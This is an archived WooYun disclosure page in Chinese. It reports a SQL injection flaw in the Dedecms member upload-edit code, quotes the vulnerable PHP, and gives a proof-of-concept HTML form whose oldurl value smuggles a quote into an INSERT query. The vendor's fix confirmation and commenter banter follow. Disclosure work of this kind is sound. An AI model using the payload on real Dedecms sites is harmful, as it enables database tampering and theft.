Dedecms 会员中心注入漏洞7 | wooyun-2014-048894| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048894

漏洞标题：Dedecms 会员中心注入漏洞7

漏洞作者： Matt

提交时间：2014-01-14 17:16

修复时间：2014-04-14 17:17

公开时间：2014-04-14 17:17

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-01-14：细节已通知厂商并且等待厂商处理中
2014-01-14：厂商已经确认，细节仅向厂商公开
2014-01-17：细节向第三方安全合作伙伴开放
2014-03-10：细节向核心白帽子及相关领域专家公开
2014-03-20：细节向普通白帽子公开
2014-03-30：细节向实习白帽子公开
2014-04-14：细节向公众公开

简要描述：

我是来继续做贡献的~

详细说明：

member/upload_edit.php
else if($dopost=='save')
{
    $title = HtmlReplace($title,2);
    if($mediatype==1) $utype = 'image';
    else if($mediatype==2)
    {
        $utype = 'flash';
    }
    else if($mediatype==3)
    {
        $utype = 'media';
    }
    else
    {
        $utype = 'addon';
    }
    $title = HtmlReplace($title, 2);
    $exname = preg_replace("#(.*)/#", "", $oldurl);// 文件名是获取.前面的
    $exname = preg_replace("#\.(.*)$#", "", $exname);
	echo $exname ;
    $filename = MemberUploads('addonfile', $oldurl, $cfg_ml->M_ID, 
$utype,$exname, -1, -1, TRUE);//返回上传的文件名
    SaveUploadInfo($title, $filename, $mediatype);//利用返回的带入查询
    ShowMsg("成功修改文件！", "uploads_edit.php?aid=$aid");
}
function SaveUploadInfo($title,$filename,$medaitype=1,$addinfos='')
{
    global $dsql,$cfg_ml,$cfg_basedir;
    if($filename=='')
    {
        return FALSE;
    }
    if(!is_array($addinfos))
    {
        $addinfos[0] = $addinfos[1] = $addinfos[2] = 0;
    }
    if($medaitype==1)
    {
        $info = '';
        $addinfos = GetImageSize($cfg_basedir.$filename,$info);
    }
    $addinfos[2] = @filesize($cfg_basedir.$filename);
    $row = $dsql->GetOne("SELECT aid,title,url FROM `#@__uploads` WHERE url 
LIKE '$filename' AND mid='".$cfg_ml->M_ID."'; ");
    $uptime = time();
    if(is_array($row))
    {
        $query = "UPDATE `#@__uploads` SET 
title='$title',mediatype='$medaitype',
                     width='{$addinfos[0]}',height='{$addinfos
[1]}',filesize='{$addinfos[2]}',uptime='$uptime'
                     WHERE aid='{$row['aid']}'; ";
        $dsql->ExecuteNoneQuery($query);
    }
    else
    {
        $inquery = "INSERT INTO `#@__uploads`
(title,url,mediatype,width,height,playtime,filesize,uptime,mid)
           VALUES ('$title','$filename','$medaitype','".$addinfos
[0]."','".$addinfos[1]."','0','".$addinfos[2]."','$uptime','".$cfg_ml-
>M_ID."'); ";echo $inquery ;//注入就在这里发生了！
        $dsql->ExecuteNoneQuery($inquery);
    }
    $fid = $dsql->GetLastID();
    AddMyAddon($fid, $filename);
    return TRUE;
}

漏洞证明：

利用方法
<form id="frmUpload" enctype="multipart/form-data" 
action="http://127.0.0.1/dede/member/uploads_edit.php?
dopost=save&title=ss&oldurl=1'.php" method="post">看Oldurl就知道了~
<input type="file" name="addonfile" id="addonfile" size="50"><br>
<input name="mode" type="hidden" value="2">
<input id="btnUpload" type="submit" value="Upload">
</form>

修复方案：

过滤啊！

版权声明：转载请注明来源 Matt@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2014-01-14 22:24

厂商回复：

已修复，感谢反馈

漏洞评价：

2014-01-14 17:17 | 坠落 ( 路人 | Rank:0 漏洞数:2 | 恩。。。。。。。)

洞主尔甚叼令尊知否
2014-01-14 17:18 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

坐等8
2014-01-14 17:19 | Matt ( 普通白帽子 | Rank:523 漏洞数:107 | 承接代码审计 http://codescan.cn/)

@坠落此小事无须知
2014-01-14 17:20 | 摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)

...赤果果的刷。
2014-01-14 17:20 | 坠落 ( 路人 | Rank:0 漏洞数:2 | 恩。。。。。。。)

@Matt 洞主此话让我不明觉厉
2014-01-14 17:21 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

我去？还在继续啊
2014-01-14 17:27 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

疯了吧，都7个了！~~
2014-01-14 17:31 | Gosuto ( 实习白帽子 | Rank:40 漏洞数:5 | )

洞主略屌啊
2014-01-14 17:37 | 3King ( 普通白帽子 | Rank:1129 漏洞数:92 | 【study at HNUST】非常感谢大家的关注~ 大...)

完全停不下来的说......
2014-01-14 17:51 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者，关注web安全。)

会员中心有7个文件吗？不是同一文件多次不算得啊！
2014-01-14 17:55 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

吊炸天了。。
2014-01-14 17:58 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

一个2k，7个1W4
2014-01-14 18:12 | 封印师 ( 路人 | Rank:4 漏洞数:3 | 我是小彩笔来的。...(｡•ˇ‸ˇ•｡) ...)

刷屏了，屌！
2014-01-14 18:12 | Fireweed ( 普通白帽子 | Rank:107 漏洞数:14 | Show me the #)

会员中心有7个文件吗？不是同一文件多次不算得啊！
2014-01-14 18:17 | 摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)

@px1624 wooyun快被dz刷穷了
2014-04-14 17:19 | dave ( 实习白帽子 | Rank:73 漏洞数:12 | ส้้้้้้้้้้้้้้้้้้้...)

dedecms 注定是一个备注

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048894

漏洞标题：Dedecms 会员中心注入漏洞7

相关厂商：Dedecms

漏洞作者： Matt

提交时间：2014-01-14 17:16

修复时间：2014-04-14 17:17

公开时间：2014-04-14 17:17

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Matt@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048894

漏洞标题：Dedecms 会员中心注入漏洞7

相关厂商：Dedecms

漏洞作者： Matt

提交时间：2014-01-14 17:16

修复时间：2014-04-14 17:17

公开时间：2014-04-14 17:17

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-048894"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Matt@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：